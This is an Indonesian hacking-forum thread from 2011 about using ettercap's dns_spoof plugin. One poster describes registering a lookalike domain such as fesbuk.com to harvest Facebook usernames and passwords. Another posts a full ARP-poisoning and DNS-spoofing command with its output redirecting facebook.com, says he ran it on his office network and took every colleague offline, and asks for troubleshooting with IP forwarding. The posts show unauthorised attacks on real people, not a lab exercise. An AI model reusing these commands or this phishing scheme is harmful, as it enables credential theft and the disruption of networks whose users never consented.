ettercap dns_spoof #PART 1
#21
oooh hanya untuk jaringan LAN toh hehe oke oke thx kk pencerahannya Big Grin
let's visit Technomorphosa Heart

#22
(09-13-2011, 12:02 PM)ezzaez Wrote: oooh hanya untuk jaringan LAN toh hehe oke oke thx kk pencerahannya Big Grin

yup kalo ente mau public fake loginnya ente harus sewa hosting sama domain dulu misalkan ente beli domain namanya fesbuk.com nanti kalo ada org yg login dari fesbuk.com password & usename nya akan ke record d file php nya tentunya nyimpen d hosting ente. cara agar victim buka fesbuk.com ya pinter2 ente aja itu mah
[shcode=This_site_xss-ed]

#23
mas bro ane mau tanya dah, knp ya setiap ane jalanin
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

1 kantor modar semua kaga bisa akses jaringan, cuman ane doang ya enjoy, ampe di omelin bos, kaoowkwkokowo suram banget dah >,<, nah trus ane masih bingung nih konsep dari tutorial ini >,<, jadi maksud dari tutorial ini begini bukan:

- kita cari mangsa dulu kan contoh: www.facebook.com trus di redirect ke local webserver kita gitu ??? atau gmn ya??? bingung nih ane. ane dah coba jalanin dengan mangsa www.facebook.com trus keluar yang bijinian:
Code:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->    AA:00:04:00:0A:04     192.168.1.106     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [pixel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [0-jk-w.channel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [0-jk-w.channel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]

udah bener belum ya ini ??? tapi ko gak di redirect ke IP web server ane yak ???
echo (attacked==1) ? defend : counter attack;

#24
(12-06-2011, 12:00 AM)biecyber Wrote: mas bro ane mau tanya dah, knp ya setiap ane jalanin
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

1 kantor modar semua kaga bisa akses jaringan, cuman ane doang ya enjoy, ampe di omelin bos, kaoowkwkokowo suram banget dah >,<, nah trus ane masih bingung nih konsep dari tutorial ini >,<, jadi maksud dari tutorial ini begini bukan:

- kita cari mangsa dulu kan contoh: www.facebook.com trus di redirect ke local webserver kita gitu ??? atau gmn ya??? bingung nih ane. ane dah coba jalanin dengan mangsa www.facebook.com trus keluar yang bijinian:
Code:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->    AA:00:04:00:0A:04     192.168.1.106     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [pixel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [0-jk-w.channel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [0-jk-w.channel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]

udah bener belum ya ini ??? tapi ko gak di redirect ke IP web server ane yak ???


itu udh di forward blom ipnya??
utk dns poisoning udh bener, tp host yg di add kok cm 1?

#25
(12-06-2011, 01:06 AM)konspirasi Wrote:
(12-06-2011, 12:00 AM)biecyber Wrote: mas bro ane mau tanya dah, knp ya setiap ane jalanin
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

1 kantor modar semua kaga bisa akses jaringan, cuman ane doang ya enjoy, ampe di omelin bos, kaoowkwkokowo suram banget dah >,<, nah trus ane masih bingung nih konsep dari tutorial ini >,<, jadi maksud dari tutorial ini begini bukan:

- kita cari mangsa dulu kan contoh: www.facebook.com trus di redirect ke local webserver kita gitu ??? atau gmn ya??? bingung nih ane. ane dah coba jalanin dengan mangsa www.facebook.com trus keluar yang bijinian:
Code:
ettercap NG-0.7.3 copyright 2001-2004 ALoR & NaGA

Listening on eth0... (Ethernet)

  eth0 ->    AA:00:04:00:0A:04     192.168.1.106     255.255.255.0

SSL dissection needs a valid 'redir_command_on' script in the etter.conf file
Privileges dropped to UID 0 GID 0...

  28 plugins
  39 protocol dissectors
  53 ports monitored
7587 mac vendor fingerprint
1698 tcp OS fingerprint
2183 known services

Randomizing 255 hosts for scanning...
Scanning the whole netmask for 255 hosts...
* |==================================================>| 100.00 %

1 hosts added to the hosts list...

ARP poisoning victims:

GROUP 1 : ANY (all the hosts in the list)

GROUP 2 : ANY (all the hosts in the list)
Starting Unified sniffing...


Text only Interface activated...
Hit 'h' for inline help

Activating dns_spoof plugin...

dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [s-static.ak.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [pixel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [0-jk-w.channel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [0-jk-w.channel.facebook.com] spoofed to [198.168.1.106]
dns_spoof: [www.facebook.com] spoofed to [198.168.1.106]

udah bener belum ya ini ??? tapi ko gak di redirect ke IP web server ane yak ???


itu udh di forward blom ipnya??
utk dns poisoning udh bener, tp host yg di add kok cm 1?

iya mas bro ip forward nya udah 1 ko
Code:
cat /proc/sys/net/ipv4/ip_forward

yang diatas itu jaringan local ane, kalo yang dikantor ada 10 host, tapi heran knp ko kalo ane nyalain command ettercap nya 1 jaringan modar semua yah -_-
echo (attacked==1) ? defend : counter attack;

#26
hasil cat diatas itu muncul angka 1 ga bro?

yakin udah di echo 1 > /proc/sys/net/ipv4/ip_forward ??

#27
(12-06-2011, 07:26 PM)konspirasi Wrote: hasil cat diatas itu muncul angka 1 ga bro?

yakin udah di echo 1 > /proc/sys/net/ipv4/ip_forward ??

beneran mas bro, sebelum saya jalanin command ini:
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

kan saya tulis dulu ip_forward nya jadi 1
Code:
echo 1 > /proc/sys/net/ipv4/ip_forward

trus saya cat dah
Code:
cat /proc/sys/net/ipv4/ip_forward
1
keluar tuh angka 1 abis di jalanin cat, nah tadi saya coba lagi dikantor, alhasil 1 jaringan kantor tepar, cuman saya doang yang bisa hawawhwhwhwh, gak ngerti dah knp itu, lagi apes kali saya, trus kalo laptop saya di scan ama pake netcut punya temen, ko ip saya jadi ada 2 biji 192.168.1.200|192.168.1.1

dan gateway nya pun terlihat 2 biji di netcut
192.168.1.1
192.168.1.1

begitu kira" ceritanya hahwh.
echo (attacked==1) ? defend : counter attack;

#28
Exclamation 
waduh... kasus baru nih mas bro:
kan IP Forward dah saya jadikan 1, dan saya cat udah ke print angka 1, nah trus ane jalanin ini kan :
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

ettercap berhasil jalan, tapi pas ane cat lagi IP Forward dia balik ke angka 0 lagi ??? kayaknya ini yang bikin jaringan 1 kantor ane modar mas bro, gmn ngatasin nya nih mas bro ??? bisa gak ya ip forward kita jalanin setelah kita jalanin command ettercapnya ??? need pencerahan plzz.
echo (attacked==1) ? defend : counter attack;

#29
Question 
sundul mas bro..., tolong bantu dong masalah diatas ^
echo (attacked==1) ? defend : counter attack;

#30
(12-06-2011, 11:52 PM)biecyber Wrote: waduh... kasus baru nih mas bro:
kan IP Forward dah saya jadikan 1, dan saya cat udah ke print angka 1, nah trus ane jalanin ini kan :
Code:
ettercap -T -q -i eth0 -P dns_spoof -M arp // //

ettercap berhasil jalan, tapi pas ane cat lagi IP Forward dia balik ke angka 0 lagi ??? kayaknya ini yang bikin jaringan 1 kantor ane modar mas bro, gmn ngatasin nya nih mas bro ??? bisa gak ya ip forward kita jalanin setelah kita jalanin command ettercapnya ??? need pencerahan plzz.

hmm? sebelumnya ane boleh tau jaringan kantor ente modar nya seperti bijimana?
[shcode=This_site_xss-ed]






Users browsing this thread: 1 Guest(s)